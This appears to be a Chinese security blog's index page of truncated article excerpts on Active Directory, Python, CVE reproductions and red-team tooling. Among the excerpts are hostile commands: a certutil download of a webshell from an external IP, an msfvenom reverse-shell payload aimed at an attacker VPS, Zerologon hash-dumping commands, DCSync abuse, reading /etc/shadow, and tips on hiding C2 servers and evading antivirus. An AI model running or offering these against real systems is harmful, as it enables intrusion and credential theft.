谢公子的博客

certutilcertutil也是windows下一款下载文件的工具，自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说，以下命令是在Win7及其以后的机器使用。远程下载certutil -urlcache -split -f http://114.118.80.138/shell.php #下载文件到当前目录下 certutil -urlcache -split -f http://114.118.80.138/shell.php c

查询域内具备Dcsync权限的用户，可以看到已经有xie\hack了hack用户拥有dcsync权限后，即可导出域内任意用户哈希，导出administrator用户的哈希，远程连接域控。

首先安装node.js和Gitbrew install node.jsbrew install git#查看安装的版本node -vgit --version然后安装hexonpm install -g hexo-cli创建博客目录，初始化mkdir blogcd bloghexo init启动hexo s...

所有的Exchange Server 默认都在Exchange Windows Permissions组里面而，这个组默认对域有WriteACL权限。所以当我们拿下Exchange服务器的时候，就可以尝试使用WriteACL赋予自身Dcsync的权限.使用powerview，为当前exchange机器名用户增加dcsync权限(此处需要使用dev分枝中的powerview)powershell.exe -execbypass -Command"& {Import-Module .powe..

默认情况下，域用户是不锁定的，即密码错误次数再多也不锁定。net accounts /domain我们可以手动修改Default Domain Policy组策略来更改账号锁定策略。然后使用密码喷洒工具进行喷洒五次测试，再用该账号进行登录尝试，可以看到显示当前用户被锁定。在域控这边可以看到hack用户已经被锁定了...

在很多时候，机器不能出网，但是又需要安装依赖包。这时，可以从网上下载依赖包然后手动进行安装，如下：下载单个离线包pip download -d test 包名批量下载离线包pip download -d test -r requirements.txt下载完之后，然后手动安装安装单个离线包：pip install --no-index 包名批量安装离线包pip install --no-index --find-links=/目录名/ -r requirements.tx

目录端口特征修改证书特征修改修改服务端证书CobaltStrike.store修改上线的证书流量特征修改SNI域前置申请配置CDN开启Listener生成木马上线ESNI域前置ESNI在红蓝对抗中，如果攻击者不通过手段隐藏C2服务器，这样可能导致C2被溯源以及被反撸。以下文章讲述如何通过手段隐蔽C2。端口特征修改CobaltStrike的连接端口默认为50050，这是个很明显的特征。要想修改这个默认端口，我们可以修改teamserver文件，将..

目录OU组织单位OU跟容器的区别OU跟组的区别OU委派OU查询OU组织单位组织单位(Organization Unit,OU)是一个容器对象，将域中的对象组织成逻辑组，帮助网络管理员简化管理组。组织单位包含下列类型的对象：用户，计算机，工作组，打印机，安全策略，其他组织单位等。可以在组织单位基础上部署组策略，统一管理组织单位中的域对象。 在企业域环境里面，我们经常看到按照部分划分的一个个OU。OU跟容器的区别组织单位（OU）是专用容器，与常规容器的区别在于管理员可以.

目录JumpServer漏洞简述漏洞影响版本漏洞环境搭建漏洞复现漏洞修复JumpServerJumpServer是使用Python Django 框架进行开发的全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 并且符合4A 的专业运维审计系统。漏洞简述2021年1月15日，JumpServer发布更新，修复了一处远程命令执行漏洞。由于 JumpServer 某些接口未做授权限制，攻击者可通过构造恶意请求获取到日志文件敏感信息，或者执行相关API操.

目录漏洞背景漏洞影响版本漏洞复现环境搭建未授权访问执行payload后回显漏洞修复漏洞背景2020年10月30日，Oracle 官方的发布最新漏洞，该漏洞编号为 CVE-2020-14882 ，漏洞等级：严重 ，漏洞评分：9.8 。远程攻击者可以构造特殊的 HTTP 请求，在未经身份验证的情况下接管 WebLogic Server Console ，并在 WebLogic ServerConsole 执行任意代码。漏洞影响版本Oracle WeblogicServ

组策略之策略设置实验本文演示组策略的策略设置对于计算机和用户的配置。计算机配置域控默认只有域管理员用户才能登陆，普通域用户不允许登陆域控。当普通域用户登录域控时，会提示如下：现在要通过配置组策略让域内的Domain Users组内的用户也可以登录域控。将通过修改默认的Default Domain Controllers Policy GPO来设置。开始——>管理工具——>组策略管理——>Default Domain Controllers Policy——>右

漏洞背景2021年1月20日，Oracle官方发布了漏洞补丁，修了包括CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中，攻击者可构造恶意请求，造成JNDI注入，执行任意代码，从而控制服务器。该漏洞为Weblogic的远程代码执行漏洞，主要由JNDI注入，导致攻击者可利用此漏洞远程代码执行，危险等级高。漏洞影响版本Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.

目录组策略管理新建组策略对象GPO编辑组策略对象应用组策略对象组策略管理管理工具——>组策略管理即可打开组策略管理面板。或者在cmd命令行中输入gpmc.msc也可打开组策略管理面板，新建组策略对象GPO右键组策略对象——>新建然后填写组策略的名字，确定即可。编辑组策略对象通过组策略管理控制台，选中对应的组策略对象，右键编辑打开组策略管理编辑器，然后配置相应的计算机配置和用户配置。应用组策略对象启用组策略实际上是将.

A-G-DL-P策略A-G-DL-P策略是指将用户账号添加到全局组中，将全局组添加到域本地组中，然后为域本地组分配资源权限。A 表示用户账号(Account) G 表示全局组(Global Group) U 表示通用组(Universal Group) DL 表示域本地组(Domain Local Group) P 表示资源权限(Permission)按照A-G-DL-P策略对用户进行组织和管理是非常容易的。在A-G-DL-P策略形成以后，当需要给一个用户添加某个权限时，只要把这个用户添加

目录Pyenv安装python版本python版本切换Pyenvpyenv它是一个简单的Python版本管理工具。前身为Pythonbrew，pyenv允许你改变全局的python版本，安装多种不同的python版本，设置应用指定的python版本以及创建/管理虚拟的python环境（”virtualenv’s”）。所有这些都在*NIX的机器上完成（Linux和OS X），它工作在用户空间，因而不需要sudo命令。mac上安装pyenv，可以使用brew。关于brew的安装，传送门：

配置终端走代理我们这里的代理工具是SSR。首先，开启SSR，如下：这里socks5端口默认是1086在终端执行命令打开终端，直接执行：(执行后，只对当前终端起作用；重启终端后，默认失效；)export http_proxy=socks5://127.0.0.1:1086 #配置http 代理访问export https_proxy=socks5://127.0.0.1:1086 #配置https 代理访问export all_proxy=socks5://127

ConfluenceConfluence是Atlassian公司开发的一个专业的企业知识管理与协同软件，也可以用于构建企业wiki。使用简单，但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论，信息推送。Confluence为团队提供一个协作环境。在这里，团队成员齐心协力，各擅其能，协同地编写文档和管理项目。从此打破不同团队、不同部门以及个人之间信息孤岛的僵局，Confluence真正实现了组织资源共享。Confluence 已经在超过100个国家，13500个组织中成功地应用

目录漏洞背景漏洞影响版本漏洞检测漏洞利用漏洞修复漏洞背景1月26日，Sudo发布安全通告，修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过 -s 或 -i 命令行选项在shell模式下运行命令时，它将在命令参数中使用反斜杠转义特殊字符。但使用 -s 或-i 标志运行 sudoedit 时，实际上并未进行转义，从而可能导致缓冲区溢出。因此只要存在sudoers文件（通常是/etc/sudoers），攻击者就可以使用本地普通用户利用s..

数据模型(Data Model)数据模型其实就是CobaltStrike官方提供的一些接口，通过这些接口我们得到一些数据。我们所有的数据都保存在服务器上，如监听器、主机信息、上传下载的东西等。Mode Function 含义 targets 存储的目标信息 显示上线过的主机信息 archives 显示最近的信息 显示最近的输出信息（慎用很卡） beacons 显示所有的受感染的主机信息 显示在线和上线过的主机 credentials

目录定义弹出式菜单定义alias关键字注册Beacon命令其他命令定义弹出式菜单弹出式菜单的关键字为popup定义CobaltStrike帮助菜单的代码如下。其中item为每一项的定义popup help { item("&Homepage",{url_open("<https://www.cobaltstrike.com/>"); }); item("&Support",{url_open("<https://...

ew的使用模式ew有六种模式，分别是：ssocksd rcsocks rssocks lcx_slave lcx_listen lcx_transsocksd是用于普通网络环境下的正向连接。rcsocks 和 rssocks 用于反向连接。lcx_slave 、lcx_listen 和 lcx_tran 用于复杂网络环境的多级连接。常用参数-l：指定要监听的本地端口 -d：指定要反弹到的机器 ip -e：指定要反弹到的机器端口 -f：指定要主动连接的机器 ip -g：

分享一款好用的CobaltStrike插件。首先上图吧，这是一款结合了taowu、Ladon、EventLogMaster等优秀开源插件的一款插件。怎么说呢，就是汇大家之所长吧。由于本人是职业红队，所以在项目中CobaltStrike用的特别多，对市面上现有的开源插件如taowu等都用过，知道这些插件哪些地方好用，哪些地方不好用，并融合自己在项目中的经验，来编写一个混合的插件。这是最初的一个1.0版本，后续会逐渐的修改bug和增加更多更新的功能。好不好用我说了不算，大家说了才算。这个插件目.

目录漏洞描述漏洞影响版本漏洞复现任意文件读取任意文件写入修复建议漏洞描述 Flink 在 1.5.1 版本中引入了一个 REST handler，这允许攻击者将已上传的文件写入本地任意位置的文件中，并且可通过恶意修改的 HTTP 头将这些文件写入到 Flink 1.5.1 可以访问的任意位置。 Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口使用 ../../ 进...

目录域功能级别Domain Functionality Level林功能级别Forest Functionality Level域功能级别Domain Functionality Level活动目录服务的域功能级别设置只会影响到该域，不会影响到其他域。域功能级别分为以下四种，不同的域功能级别各有不同的特点：Windows Server 2008：域控可以是Windows Server 2008、Windows Server 2008R2、Windows Server 2012 和 Win

目录可重新启动的活动目录服务(Restartable AD DS)活动目录回收站可重新启动的活动目录服务(Restartable AD DS) 在旧版Windows域控内，若要进行活动目录数据库维护工作，就需要重新启动计算机进入目录服务还原模式(Directory Service Restore Mode)来执行维护工作。若这台域控也同时提供其他网络服务，例如它同时也是DHCP服务器，则重新启动计算机将造成这些服务暂时中断。 Windows Server 2012 R...

Administrator：默认的域内管理员用户 Schema Admins：该组的用户可以修改架构内的数据，域内架构的指定系统管理员

父域控：192.168.8.111，域名：xie.com子域控：192.1.68.8.112，域名：son.xie.com搭建父域控先修改ip属性一直下一步，然后安装填入你的域名，如：xie.com由于域名是xie.com，所以这里的NetBIOS域名默认填为 XIE安装完成后，域控搭建完成搭建子域控...

Provider提供程序在PowerShell中，对于文件系统，如 c:\abc、d:\abc，我们可以通过Get-ItemProperty，Get-Item， Get-ChildItem等命令访问。访问注册表，证书存储，环境变量，函数，WSMan其实都可以像访问文件系统一样，使用Get-ItemProperty，Get-Item， Get-ChildItem等命令访问。这一切都得益于，PowerShell为这些资源注册了一个Provider（中文翻译为：提供程序） 。Provider提供的是数据，提供

执行powershell命令或powershell脚本执行powershell命令item "查看powershell执行策略" { local('$bid'); foreach $bid ($1){ blog($1, "-------------------------------------------------------------查看powershell执行策略------------------------------------------------------

管道 讲命令管道之前先来讲下管道。管道并不是什么新鲜事物，它是一项古老的技术，可以在很多操作系统（Unix、Linux、Windows 等）中找到，其本质是是用于进程间通信的共享内存区域，确切的说应该是线程间的通信方法（IPC）。 管道是一个有两端的对象。一个进程向管道写入信息，而另外一个进程从管道读取信息。进程可以从这个对象的一个端口写数据，从另一个端口读数据。创建管道的进程称为管道服务器（Pipe Server），而连接到这个管道的进程称为管道客户端（Pipe Clien...

目录注册表注册表结构reg增删改查注册表Windows注册表就相当于Windows系统的数据库，系统和软件的配置信息放在注册表里面。如果注册表出现了问题，可能导致系统崩溃。我们平时是使用regedit.exe命令来使用图形化界面管理注册表的。而在很多时候，使用图形化界面管理注册表很麻烦。所以今天介绍一种使用纯命令行的工具(reg.exe)来管理注册表。使用 reg.exe 可以对注册表进行添加、删除、修改、查看等操作。注册表结构注册表有四个关键术语：键、值、...

目录PowerShell的帮助系统使用帮助系统查找命令使用帮助系统查看指定命令的详细用法PowerShell的帮助系统可以输入 Get-help 、help或man来查看帮助系统。help 是对 Get-help 进行封装的函数，而 man 是 help 的别名。Get-help和help的区别在于，help可以以分页的形式阅读输出，而Get-help则是一次性把所有输出都显示出来。powershell的帮助文档是可以经常更新的。我们可以使用命令：update-help来更新...

通达OA 前台任意用户登录漏洞漏洞描述通达OA官方于4月17日发布安全更新。在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求，可以直接绕过登录验证逻辑，伪装为系统管理身份登录OA系统。影响范围 通达OA2017 (V10.x) 通达OAV11.x < 11.5.200417版本 漏洞复现搭建好环境，这里环境使用的是通达OA2017版利用脚本获取cookiepython3 tongda-oA.py -v 2017 -ur.

UPX UPX (the Ultimate Packer for eXecutables)是一款先进的可执行程序文件压缩器，压缩过的可执行文件体积缩小50%-70% ，这样减少了磁盘占用空间、网络上传下载的时间和其它分布以及存储费用。 通过 UPX 压缩过的程序和程序库完全没有功能损失和压缩之前一样可正常地运行，对于支持的大多数格式没有运行时间或内存的不利后果。 UPX 支持许多不同的可执行文件格式 包含 Windows 95/98/ME/NT/2000/XP/CE 程序和动态链接库、DOS 程...

在红蓝对抗中，不管是红队还是蓝队，都需要对RDP远程桌面的知识具有很深的了解。RDP开放端口RDP默认端口为3389，但是，在很多情况下，运维人员会将RDP端口修改为其他端口。那么，我们就需要知道RDP修改后的真正端口了。可以通过执行以下命令查询tasklist /svc | findstr TermService #查找RDP进程的PIDnetstat -ano | findstr 上一步查询到的PID #过滤上一步的PID，查找出对应的端口也可以使用RegRdpPor

nim Nim是一个新型的静态类型、命令式编程语言，支持过程式、函数式、面向对象和泛型编程风格而保持简单和高效。Nim从Lisp继承来的一个特殊特性--抽象语法树(AST)作为语言规范的一部分，可以用作创建领域特定语言的强大宏系统。Nim是一个编译型的具有垃圾收集的系统编程语言，有着极其卓越的生产/性能比。Nim的设计集中在三个E上：即效率(efficiency)、表达能力(expressiveness)和优雅(elegance)。而我们学习nim的目的就是为了做免杀。大多数杀软对于新型的偏门小类..

FastjsonFastjson是一个阿里巴巴开源的一款使用Java语言编写的高性能功能完善的JSON库，通常被用于将Java Bean和JSON 字符串之间进行转换。它采用一种“假定有序快速匹配”的算法，把JSON Parse的性能提升到极致，是目前Java语言中最快的JSON库。Fastjson接口简单易用，已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。但是，从诞生之初，fastjson就多次被爆出存在反序列化漏洞。并且，每次都和autoType有关！那么，什

作为红队人员来说，CobaltStrike是必不可少的远控。其最大的优势在于能团队协作，并且可以灵活的进行功能扩展。而Aggressor-Script语言就是给CobaltStrike扩展功能的首选语言。Aggressor-Script语言语法基础Aggressor-Script语言使用 #开头，到行尾结束。变量Aggressor-Script语言变量使用 $符号开头。在为变量赋值的时候，=号两边需要添加空格，如果不添加空格，编译器会报错。$x = 1 + 2;数组定义数...

参考文章：https://blog.csdn.net/weixin_45039616/article/details/106637978 https://www.freebuf.com/news/193509.html

MongoDBMongoDB是一个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。MongoDB 是一个介于关系型数据库和非关系型数据库之间的产品，是非关系数据库当中功能最丰富，最像关系数据库的。MongoDB在高负载的情况下，添加更多的节点，可以保证服务器性能。MongoDB 将数据存储为一个文档，数据结构由键值(key=>value)对组成。MongoDB 文档类似于 JSON 对象。字段值可以包含其他文档，数组及文档数组。

Apache FlinkApache Flink是由Apache软件基金会开发的开源流处理框架，其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序，Flink的流水线运行时系统可以执行批处理和流处理程序。此外，Flink的运行时本身也支持迭代算法的执行msfvenom -p java/shell_reverse_tcp LHOST=VPS的ip地址 LPORT=34567 -f jar > test.jar漏洞描述近日,有安全研

在红蓝对抗过程中，在内网中经常会碰到Vmware相关的产品。如：VMware ESXi登录 vRealize Operations Manager Login | Appliance Management vSphere Web Client相关文章：安装ESXi

有很多时候，我们测试的时候，会需要用到445端口。而windows默认该端口是开放的，那么我们如何关闭该端口的占用状态呢？不是通过防火墙阻止445端口的连接来关闭，这种是阻止外部连接，但是本地445端口还是开放的。我们这里讲的是关闭占用445端口的服务！关闭Server服务打开cmd，执行：services.msc打开服务窗口然后重启机器就可以看到445端口已经没有占用了。...

SDProp与AdminSDHolder受保护对象（通常是一些特权内置账号如Domain Admins、Enterprise Admins等）被系统安全策略保护，以避免这些特权对象被恶意修改或滥用（防止被删除、修改权限等）。每一个被保护的对象由SDProp进程（Security Descriptor Propagation）监控保护，SDProp进程每60分钟运行一次，运行时检查受保护对象的安全描述符，检查将依照AdminSDHolder容器的ACL，如果受保护对象的ACL配置与AdminSDHolde

组策略 组策略是Windows环境下用户管理对象的一种手段。组策略分为本地组策略和组策略。本地组策略适合于管理独立的未加入域的工作组的机器。而组策略则是用于管理域环境中的对象；本文主要讲解域环境中的组策略。关于本地组策略，传送门： 域环境中通过配置组策略可以对域中的用户、用户组、计算机进行不同维度的管理；如安全配置、注册表配置、软件安装配置、开关机与登入登出管理等。配置的组策略通过关联到站点、域、组织单位上来在不同层级上应用不同的策略配置。组策略配置分为两部分，分别是计算机配置和...

目录impacket攻击挂socks5代理打使用mimikatz攻击恢复域控的机器用户哈希获得域控机器账号原始哈希方式一 ：方式二：恢复域控原始哈希impacket攻击先执行如下命令判断域控是否存在该漏洞python3 zerologon_tester.py win2008 192.168.10.131该脚本会将域控的机器账号哈希置为空#查询域控的机器用户哈希./secretsdump.py xie.com/administrator:p..

ACL访问控制列表ACL(Access Control List)是Windows环境中访问控制模型的重点，用来表示用户(组)权限的列表。ACL微软官方文档：https://docs.microsoft.com/en-us/windows/desktop/SecAuthZ/access-control-lists简单来说，访问控制是指某主体(subject)允许或不被允许对某实体(object)执行读取、写入、删除、更改等操作。在Windows中，subject通常是进程，object是指安全对

在渗透测试中，经常会碰到需要测试app的情况。用手机测试则会很不方便，所以我们一般都会用模拟器来安装app测试。这里我们使用的是夜伸模拟器。安装好夜伸模拟器后，我们如何配置模拟器，使burp能抓取到模拟器内app的数据包呢？burp配置首先，配置burp，这里先用ipconfig查看当前的ip地址(wifi或网线的地址)，然后配置完成即可模拟器配置我们打开设置——>WLAN，然后长按WiredSSID——>修改网络高级选项——>代理——>手动

在DCSync功能出现之前，要想获得域用户的哈希，需要登录域控制器，在域控制器上执行代码才能获得域用户的哈希。2015年8月，新版的mimikatz增加了DCSync的功能，该功能可以模仿一个域控DC，从真实的域控中请求数据，如用户的哈希。该功能最大的特点就是可以实现不登录到域控而获取域控上的数据。在域中，不同的DC之间，每隔15分钟会进行一次域数据的同步。当一个DC（辅助DC）想从其他DC（主DC）获取数据时，辅助DC会向主DC发起一个GetNCChanges请求。请求的数据包括需要同步的数据。如果需

前言：在渗透测试过程中，我们经常会碰到登录处用js加密字段的情况。在大多数情况下，看到这种加密方式，我们都会放弃对该登录处进行暴力破解。本文主要讲解对js加密进行绕过，以达到爆破或绕反爬的目的！案例一：对登录处使用sm2国密加密算法的某网站进行爆破该网站图形验证码失效，只要能对密码字段进行相应的加密，就可以爆破！访问网站，输入用户名：admin、密码：123456 以及正确的图形验证码进行登录。抓包，可以看到密码字段被加密为很长的一段字符F12打开开发者调试模式，...

首先，Windows Server2008R2需要加入域环境中，我这里Windows Server 2008R2就是域控，在域控上安装Exchange服务。以管理员权限打开PowerShell，执行以下命令import-Module ServerManagerAdd-WindowsFeature NET-Framework,RSAT-ADDS,Web-Server,Web-Basic-Auth,Web-Windows-Auth,Web-Metabase,Web-Net-Ext,Web-Lgcy

管理工具——>组策略管理

如今，网站变得越来越流行。无论是大公司还是小公司，或者是提供其他服务的公司，都有自己的网站。随着网站的流行，开发网站的技术也犹如春笋一般涌起。所以，我特意总结了下网站开发的一些技术。网站开发可分为前端开发和后端开发。前端主要包括：HTML 、CSS 、JavaScript技术。基于JavaScript的框架包：jQuery：JavaScript包，它封装JavaScript常用的...

PIL/PillowPIL(Python Image Library)是Python的第三方图像处理库，功能强大，使用人数众多。PIL历史悠久，原来是只支持 python2.x 的版本，后来出现了移植到python3的库Pillow，其功能和PIL差不多，但是支持python3。PIL和Pillow的调用都是 import PIL。所以，以下Pillow称为PIL，因为我的环境是pytho...

在python GIL之下，同一时刻只能有一个线程在运行，那么对于CPU计算密集的程序来说，线程之间的切换开销就成了拖累，而以I/O为瓶颈的程序正是协程所擅长的。协程，又称为微线程，它是实现多任务的另一种方式，只不过是比线程更小的执行单元。因为它自带CPU的上下文，这样只要在合适的时机，我们可以把一个协程切换到另一个协程。通俗的理解：在一个线程中的某个函数中，我们可以在任何地方保存当前函数的一些临时变量等信息，然后切换到另外一个函数中执行，注意不是通过调用函数的方式做到的，并且切换的次数以及什...

json模块是python中用来解析json数据格式的模块。json中有两种数据结构：对象和数组。对象：用大括号表示，由键值对组成，每个键值对用逗号隔开。其中key必须为字符串且是双引号，value可以是多种数据类型。 数组：用中括号表示，每个元素之间用逗号隔开。json中的字符串都要用双括号表示，json数据可以嵌套出结构更加复杂的数据。函数 描述 json.dumps 将 Python 对象编码成 JSON 字符串 json.loads 将已编码的 JSON

云概念 随着技术的发展，云服务器逐渐的取代了普通的机房，越来越多的公司选择将自己的服务迁移到云上。原因在于使用云平台成本更低，可扩展性强，安全性，方便管理。 那么，什么是云呢？云服务器(Elastic Compute Service, ECS)是一种简单高效、安全可靠、处理能力可弹性伸缩的计算服务。其管理方式比物理服务器更简单高效。用户无需提前购买硬件，即可迅速创建或释放任意多台云服务器。云服务器可以帮助您快速构建更稳定、安全的应用，降低开发运维的难度和整体IT成本，使您能够更专...

PyCrypto是使用Python编写的加密工具包，很多脚本中经常会用到。所以我们有必要安装他。但是，在Windows下使用pip install pycrypto进行安装的时候，经常会报错。为了解决这个问题，我们可以到这个网站：http://www.voidspace.org.uk/python/modules.shtml#pycrypto 下载编译好的PyCrypto包直接双击执行安装即可。...

将python文件编译成exe文件需要第三方库：pyinstaller ，执行命令：pip3 install pyinstaller即可安装。进入python文件路径下(不能含有中文)，执行命令：pyinstaller -F 1.py执行完命令后，会生成如下文件。在dist目录下会有生成的exe文件，该exe文件就是我们要生成的文件。...

域信任是为了解决多域环境中的跨域资源共享问题而诞生的。域信任作为一种机制，允许另一个域的用户在通过身份验证后访问本域中的资源。同时，域信任利用DNS服务器定位两个不同子域的域控制器，如果两个域中的域控制器都无法找到另一个域，那么也就不存在通过域信任关系进行跨域资源共享了。域信任关系分为单向信任和双向信任：单向信任是指在两个域之间创建单向的信任路径，即在一个方向上是信任流，在另一个方向上是访问流。在受信任域和信任域之间的单向信任中，受信任域内的用户或计算机可以访问信任域中的资源，但信任域内的用户却

目录Pystinger实现多主机上线cs目标主机执行VPS执行CS开启监听生成木马内网横向移动Pystinger一款利用webshell实现内网socks4代理、端口映射的工具，可直接用于MSF/CS等上线。使用python编写， 当前支持php,jsp(x),aspx三种代理脚本 。项目地址： https://github.com/FunnyWolf/pystinger原地介绍： https://mp.weixin.qq.com/s/45AKbRS677fxyn

Linux反弹shell Linux系统应急响应 Linux服务器安全加固 Linux下的用户、组和权限 Linux中的gcc Linux中su和sudo的用法和区别 Linux系统python2与python3共存 Linux中grep工具的使用 Linux中环境变量的设置 Linux中常见的150个命令(干货) Linux中编写Shell脚本 LNMP环境搭建Wordpress博客 LAMP环境搭建一个Discuz论坛 Linux运维比较常用的一些脚本 Linux系统中安装软

Windows提权：Windows提权总结 Windows组策略首选项提权 Windows错误配置提权 Windows内核溢出漏洞提权 绕过UAC提权 Windows PR提权Linux提权：Linux提权 Linux下用SUID提权 Linux提权之利用 /etc/passwd 文件 Linux提权—脏牛漏洞(CVE-2016-5195) MySQL UDF提权执行系统命令...

ThinkPHP框架漏洞 Struts2漏洞检测和利用 Gitlab相关漏洞 Weblogic相关漏洞 Jboss相关漏洞 Tomcat漏洞集合

一次完整的渗透测试流程 注册、登录、密码修改页面渗透测试经验小结 子域名查询、DNS记录查询 渗透测试之信息收集 信息收集之利用Shodan搜索ico相同的网站 信息收集之Github搜索语法 Webshell和一句话木马 SQL注入之注入点的判断 SQL注入过滤的绕过 绕过CDN查找网站真实ip 403页面 分析网站登录处的加密算法 使用DNSLog进行盲打 绕过网站WAF(图片绕过) PHP中执行系统命令 WAF的工作原理和绕过浅析 RDPInception攻击手法..

内网转发工具的使用 内网转发及隐蔽隧道 Linux利用iptables做端口复用 利用python脚本实现端口复用 Windows利用WinRM实现端口复用打造隐蔽后门

Windows本地认证和NTLM认证 Windows渗透基础大全 Windows Server系统加固 Windows中的用户和组 利用DCOM执行系统命令 WindowsServer2012R2安装Exchange Server2016 Windows修改注册表实现自启动 Windows权限维持 远程连接Windows系统 Windows中获取用户密码 Windows目录介绍 psexec工具使用浅析(admin$) PowerShell使用浅析 Windows提权总结 WMI

内网渗透 内网域环境渗透 内网非域环境渗透 内网渗透之MS17-010 获取权限后的操作 利用委派打造隐蔽后门(权限维持) NTLM Relay(中继)攻击 域控权限持久化之Hook PasswordChangeNotify 域控权限持久化之Skeleton Key(万能密码) 域控权限持久化之注入SSP 域控权限持久化之SID History域后门 域控权限持久化之DSRM后门 DCOM的使用 域渗透之SPN服务主体名称 内网渗透之AccessToken窃取与利用 哈希传递攻

JAVA反序列化漏洞复现OpenSSH命令注入漏洞复现(CVE-2020-15778)F5 BIG-IP TMUI远程代码执行漏洞复现(CVE-2020-5902)DNS Server远程代码执行漏洞复现(CVE-2020-1350)CVE-2020-0688漏洞复现CVE-2019-1040域内漏洞提权复现CVE-2020-0796(SMBv3远程代码执行)漏洞复现通达OA低版本文件上传+apache解析漏洞getshell通达OA命令执行漏洞复现(文件上传+文件包含)

常用工具：Nmap使用详解 Sqlmap使用详解 CobaltStrike的使用 Metasploit Framework(MSF)的使用 CobaltStrike上线微信提醒 CobaltStrike的argue参数污染绕AV CobaltStrike证书修改躲避流量审查 CobaltStrike上线Linux主机(CrossC2)域内工具：Linux下使用ldapsearch进行域信息查询 AD Explorer和The LDAP Explorer工具的用法 ADSI(Act

SeatbeltSeatbelt是一个采用C#写的Windows下信息收集的工具。它从进攻性和防御性安全性角度执行许多面向安全性的主机调查“安全性检查”。

目录通过DNS管理器获取DNS记录通过dnscmd获取DNS记录域内远程读取DNS记录的方法在内网进行横向渗透时，通过对DNS记录的获取，可以定位很多重要的服务器。通过DNS管理器获取DNS记录需要在域控上操作。开始——>管理工具——>DNS通过dnscmd获取DNS记录位于：c:\windows\system32\dnscmd.exe ，以下系统默认安装有dnscmdWindows Server 2003 Windows Server 2008..

SQLiteSQLite是一款轻型的关系型数据库管理系统，它包含在一个相对小的C库中。它是D.RichardHipp建立的公有领域项目。它的设计目标是嵌入式的，而且已经在很多嵌入式中使用了它，它占用资源非常的低，在嵌入式设备中，可能只需要几百K的内存就够了。它能够支持Windows/Linux/Unix等等主流的操作系统，同时能够跟很多程序语言相结合，比如 Tcl、C#、PHP、Java等，还有ODBC接口，同样比起Mysql、PostgreSQL这两款开源的世界著名数据库管理系统来讲，它的处理速度比他

NPS是一款好用的内网穿透工具，不过相比于FRP还是稍微比较麻烦一点，原因在于NPS的服务端需要安装。以下是NPS的使用：工具下载地址：https://github.com/ehang-io/nps/releases官方说明文档：https://ehang-io.github.io/nps/#/api服务端的安装首先查看服务器的架构，下载对应版本的NPS。我的服务器是x86_64的，所以下载 linux_amd64_server.tar.gz上传到服务器，解压，安装tar

漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听，连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发， 并以BSD样式的许可证提供，且已被集成到许多商业产品中。 2020年6月9日，研究人员Chinmay Pandya在Openssh中发现了一个漏洞，于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令，攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。...

whoami #查看当前用户身份uname -a #查看系统信息history #查看命令历史，有可能可以查看到管理员的一些重要命令，包括密码等last #查看登录历史cat /etc/passwd #查看用户cat /etc/shadow #查看密码traceroute baidu.comcat /etc/hosts #查看hosts文件cat /etc/resolv.conf #查看dns信息...

ldapsearch是类unix下一款用于域信息查询的工具ldapsearch -x -h 192.168.10.131 -D "administrator@xie.com" -w P@xxx23 -b "CN=Users,DC=xie,DC=com" dn未完待续。。

AD Explorer是一款域内信息查看工具，其相对于ADSI编辑器，更加方便。只需要把ADExplorer.exe工具拷贝到域内任意一台主机打开，然后输入域控ip和普通域用户账号密码即可连接。

LDP是微软自带的一款域内信息查询工具，在域控的 cmd 窗口执行ldp即可打开LDP。普通域成员主机默认是没有LDP的，可以自行上传ldp.exe工具上去域控打开，直接cmd窗口执行ldp即可。普通域主机打开LDP，自行上传ldp.exe...

目录查询Active DirectoryBaseDN过滤规则查询Active Directory通过查询目录，可以直接收集到要求的数据。查询目录需要指定两个要素BaseDN 过滤规则BaseDNBaseDN指定了这棵树的根。比如指定BaseDN为DC=xie.DC=com就是以DC=xie.DC=com为根往下搜索BaseDN为CN=Users,DC=xie.DC=com就是以CN=Users,DC=xie.DC=com为根往下搜索过滤规则LDAP 过滤规

ConfigParseConfigParse模块是python中用来读配置文件的。用法很简单。这里假设我们这里有一个配置文件config.txt，内容如下[people]name = xieage = 18sex = man

CVE-2020-3452漏洞描述思科官方链接：https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86参考文章：https://mp.weixin.qq.com/s/zm0NXfBQLbqU0kZ9Uk7qLQ

Naming Context首先有一点得明确，Active Directory具有分布式特性，一个林中有若干个域，每个域内有若干台域控，每台域控有一个独立的Active Directory。这个时候就有必要将数据隔离到多个分区中，如果不隔离的话，则每个域控制器都必须复制林中的所有数据。若隔离为若干个分区之后，就可以有选择性的复制某几个分区。微软将Active Directory划分为若干个分区(这个分区我们称为Naming Context，简称NC)，每个Naming Context都有其自己的安全边界

目录LDAPAD(Active Directory)LDAPLDAP(Lightweight Directory Access Protocol)轻量目录访问协议。顾名思义，LDAP是设计用来访问目录数据库的一个协议。在这之前我们先介绍一下目录服务。目录服务是由目录服务数据库和目录访问协议组成。目录服务数据库也是一种数据库，这种数据库相对于我们熟知的关系型数据库(比如MySQL,Oracle),主要有以下几个方面的特点。 它成树状结构组织数据，类似文件目录一样。 它是

